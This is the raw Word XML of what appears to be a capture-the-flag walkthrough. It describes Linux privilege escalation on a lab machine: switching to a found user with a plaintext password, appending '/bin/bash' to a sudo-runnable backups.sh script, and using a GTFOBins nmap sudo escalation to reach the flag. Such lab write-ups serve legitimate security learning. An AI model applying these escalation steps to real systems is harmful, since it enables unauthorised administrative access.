    <w:p w14:paraId="22FDCCAC" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="5492B987" w14:textId="5EA1A48C" w:rsidR="00C33B2B" w:rsidRDefault="002A2B5D" w:rsidP="00C33B2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A24FE4F" wp14:editId="7A326540">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3571429" cy="457143"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="158427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759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45">
        <w:t xml:space="preserve">Update </w:t>
      </w:r>
      <w:r w:rsidR="00C33B2B">
        <w:t>terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCE044" w14:textId="7CA19A19" w:rsidR="00C33B2B" w:rsidRDefault="00C33B2B" w:rsidP="00C33B2B"/>
    <w:p w14:paraId="70209C6F" w14:textId="77777777" w:rsidR="0075106C" w:rsidRDefault="0075106C" w:rsidP="00350D1B"/>
    <w:p w14:paraId="16AD59ED" w14:textId="2750349D" w:rsidR="0075106C" w:rsidRDefault="009E6240" w:rsidP="00425F5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8D03D2C" wp14:editId="303633AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>274624</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4096385" cy="1044575"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1779583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3523" name="Picture 1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36">
        <w:t>Now navigate to the home directory and see what mark has in his directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CECFC" w14:textId="01E773C0" w:rsidR="00200386" w:rsidRDefault="00200386" w:rsidP="00200386"/>
    <w:p w14:paraId="5763A9C0" w14:textId="77777777" w:rsidR="0075106C" w:rsidRDefault="0075106C" w:rsidP="00350D1B"/>
    <w:p w14:paraId="6EE3C665" w14:textId="77777777" w:rsidR="0075106C" w:rsidRDefault="0075106C" w:rsidP="00350D1B"/>
    <w:p w14:paraId="14C89AE8" w14:textId="77777777" w:rsidR="0075106C" w:rsidRDefault="0075106C" w:rsidP="00350D1B"/>
    <w:p w14:paraId="57B82F7C" w14:textId="3BA2643A" w:rsidR="0075106C" w:rsidRDefault="009E6240" w:rsidP="009E6240">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We have obtained a new set of credentials.</w:t>
      </w:r>
      <w:r w:rsidR="00B017DD">
        <w:t xml:space="preserve"> User:</w:t>
      </w:r>
      <w:r w:rsidR="001C1F8E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B017DD">
        <w:t>graham, pass:</w:t>
      </w:r>
      <w:r w:rsidR="00B017DD" w:rsidRPr="00B017DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B017DD" w:rsidRPr="00B017DD">
        <w:t>GSo7isUM1D4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29541335" w14:textId="77777777" w:rsidR="002654A2" w:rsidRDefault="002654A2" w:rsidP="002654A2"/>
    <w:p w14:paraId="038D719D" w14:textId="2E3EE2EF" w:rsidR="00BE58C9" w:rsidRDefault="00BE58C9" w:rsidP="00BE58C9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Call ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> graham’ and enter the password </w:t>
      </w:r>
      <w:r w:rsidRPr="00B017DD">
        <w:t>GSo7isUM1D4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF0688F" w14:textId="77777777" w:rsidR="006B5591" w:rsidRDefault="006B5591" w:rsidP="006B5591"/>
    <w:p w14:paraId="34112860" w14:textId="383A1B8C" w:rsidR="00350D1B" w:rsidRDefault="006B5591" w:rsidP="003B3A55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Running ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –l’ we can see that we can run backups.sh without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF314CF" w14:textId="3571940D" w:rsidR="00350D1B" w:rsidRDefault="006B5591" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="500985CB" wp14:editId="220FB673">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>321411</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7315</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4008120" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="226619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9066" name="Picture 1" descr="A screen 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F14D5" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="34AA6B7F" w14:textId="61D943DC" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="3189C207" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="547BFA9F" w14:textId="0F3125A4" w:rsidR="00350D1B" w:rsidRDefault="00910C5D" w:rsidP="00910C5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Now check what backups.sh does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205458CA" w14:textId="77777777" w:rsidR="00063F18" w:rsidRDefault="00063F18" w:rsidP="00063F18"/>
    <w:p w14:paraId="63BA3936" w14:textId="31525181" w:rsidR="00CE0A8C" w:rsidRDefault="006425CC" w:rsidP="00CE0A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8B31B38" wp14:editId="2A8880A9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1119226</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>407061</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3635375" cy="374015"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="870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565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11">
        <w:t xml:space="preserve">The file backups.sh can be executed on behalf of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D7011">
        <w:t>jens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D7011">
        <w:t>. We can exploit this by appending ‘/bin/bash’ to the end of the file.</w:t>
      </w:r>
      <w:r w:rsidR="00105582">
        <w:t xml:space="preserve"> This should allow us to obtain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00105582">
        <w:t>jens</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00105582">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D45C6" w14:textId="475E6DCB" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="24F8C76B" w14:textId="0B5883E9" w:rsidR="000B31EE" w:rsidRDefault="000B31EE" w:rsidP="00350D1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4803DC5B" wp14:editId="7CD327CF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2485974</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>75996</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1066667" cy="171429"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15798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7992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EEE12" w14:textId="07E23002" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="76C60758" w14:textId="76287F51" w:rsidR="00350D1B" w:rsidRDefault="000B31EE" w:rsidP="00350D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7C0B327" wp14:editId="1B499444">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>160757</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>470103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2264410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="14410008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0800" name="Picture 1" descr="A screenshot of a computer scree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BC">
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E12ABC">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E12ABC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E12ABC">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E12ABC">
        <w:t xml:space="preserve"> section. The only thing I was required to add was the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E12ABC">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E12ABC">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E12ABC">
        <w:t>infront</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E12ABC">
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E12ABC">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E12ABC">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343A569" w14:textId="47F57244" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="4722F97B" w14:textId="588388B6" w:rsidR="00350D1B" w:rsidRDefault="00623E53" w:rsidP="00623E53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gotten the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EDEB3" w14:textId="3463E67A" w:rsidR="00D71A96" w:rsidRDefault="00D71A96" w:rsidP="00D71A96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429C268" wp14:editId="778DAB5C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>58445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3430270" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="852703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3614" name="Picture 1" descr="A screenshot of a computer scree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81873" w14:textId="08DA2902" w:rsidR="00D71A96" w:rsidRDefault="00D71A96" w:rsidP="00D71A96"/>
    <w:p w14:paraId="0ED73F94" w14:textId="275A9D1F" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="46094B74" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="3FA94BB8" w14:textId="7B8335DD" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="66402936" w14:textId="4C3D35BB" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="4BE2CFA4" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="7E358144" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="3888AB39" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="7AEDDED1" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="5006F27F" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="35BB2273" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="210FBF65" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="2CA194CD" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="333E46C9" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="4A71D47D" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="50F26281" w14:textId="77777777" w:rsidR="00350D1B" w:rsidRDefault="00350D1B" w:rsidP="00350D1B"/>
    <w:p w14:paraId="7F01D39F" w14:textId="7F0D6E76" w:rsidR="00E54D1A" w:rsidRDefault="00E54D1A" w:rsidP="00E54D1A"/>
    <w:sectPr w:rsidR="00E5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D9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7487BBE"/>
    <w:lvl w:ilvl="0" w:tplc="693A3C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45AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="845C421A"/>
    <w:lvl w:ilvl="0" w:tplc="85101B3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3715"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="769223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4EC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F0E9956"/>
    <w:lvl w:ilvl="0" w:tplc="8778A5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46">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2050303032">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1422989711">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="76750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B6"/>
    <w:rsid w:val="00063F18"/>
    <w:rsid w:val="000A73BC"/>
    <w:rsid w:val="000B31EE"/>
    <w:rsid w:val="000C54C1"/>
    <w:rsid w:val="00100DFD"/>
    <w:rsid w:val="00105582"/>
    <w:rsid w:val="001B0857"/>
    <w:rsid w:val="001C1F8E"/>
    <w:rsid w:val="00200386"/>
    <w:rsid w:val="00222455"/>
    <w:rsid w:val="002654A2"/>
    <w:rsid w:val="00274CB1"/>
    <w:rsid w:val="002A2B5D"/>
    <w:rsid w:val="002D079D"/>
    <w:rsid w:val="002D2536"/>
    <w:rsid w:val="002E5FB6"/>
    <w:rsid w:val="00305ED6"/>
    <w:rsid w:val="003371E9"/>
    <w:rsid w:val="00350D1B"/>
    <w:rsid w:val="003A2094"/>
    <w:rsid w:val="003B3A55"/>
    <w:rsid w:val="003C20BC"/>
    <w:rsid w:val="00425F55"/>
    <w:rsid w:val="0048003F"/>
    <w:rsid w:val="00546E11"/>
    <w:rsid w:val="00567543"/>
    <w:rsid w:val="0059544C"/>
    <w:rsid w:val="005D6B42"/>
    <w:rsid w:val="006211CD"/>
    <w:rsid w:val="00621939"/>
    <w:rsid w:val="00623E53"/>
    <w:rsid w:val="00635E2F"/>
    <w:rsid w:val="006425CC"/>
    <w:rsid w:val="00645B67"/>
    <w:rsid w:val="00674A4E"/>
    <w:rsid w:val="006B5591"/>
    <w:rsid w:val="0075106C"/>
    <w:rsid w:val="007D1A60"/>
    <w:rsid w:val="007E1265"/>
    <w:rsid w:val="00802E6F"/>
    <w:rsid w:val="00810436"/>
    <w:rsid w:val="00820945"/>
    <w:rsid w:val="008A6F2F"/>
    <w:rsid w:val="00910C5D"/>
    <w:rsid w:val="00911009"/>
    <w:rsid w:val="009C6BAE"/>
    <w:rsid w:val="009D7011"/>
    <w:rsid w:val="009E5D43"/>
    <w:rsid w:val="009E6240"/>
    <w:rsid w:val="009F64B9"/>
    <w:rsid w:val="00A1135A"/>
    <w:rsid w:val="00AA097E"/>
    <w:rsid w:val="00AA61C2"/>
    <w:rsid w:val="00AE3C94"/>
    <w:rsid w:val="00B017DD"/>
    <w:rsid w:val="00B057E9"/>
    <w:rsid w:val="00BB5D77"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00BE58C9"/>
    <w:rsid w:val="00BE614E"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C33B2B"/>
    <w:rsid w:val="00C53776"/>
    <w:rsid w:val="00C739D0"/>
    <w:rsid w:val="00C753E4"/>
    <w:rsid w:val="00C8792B"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00CE0A8C"/>
    <w:rsid w:val="00CF2BEC"/>
    <w:rsid w:val="00D10F31"/>
    <w:rsid w:val="00D11AF5"/>
    <w:rsid w:val="00D35A06"/>
    <w:rsid w:val="00D71A96"/>
    <w:rsid w:val="00DB29BB"/>
    <w:rsid w:val="00DC5E71"/>
    <w:rsid w:val="00DE5AEA"/>
    <w:rsid w:val="00E12ABC"/>
    <w:rsid w:val="00E54D1A"/>
    <w:rsid w:val="00E75BB6"/>
    <w:rsid w:val="00EC4B92"/>
    <w:rsid w:val="00EC6F52"/>
    <w:rsid w:val="00EE13E6"/>
    <w:rsid w:val="00EF5545"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00FA402C"/>
    <w:rsid w:val="00F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4856"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2059E211-89C3-4728-BE59-F6C9A981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wpscan; searchsploit; nmap suid</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>104</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-17T10:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-17T12:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>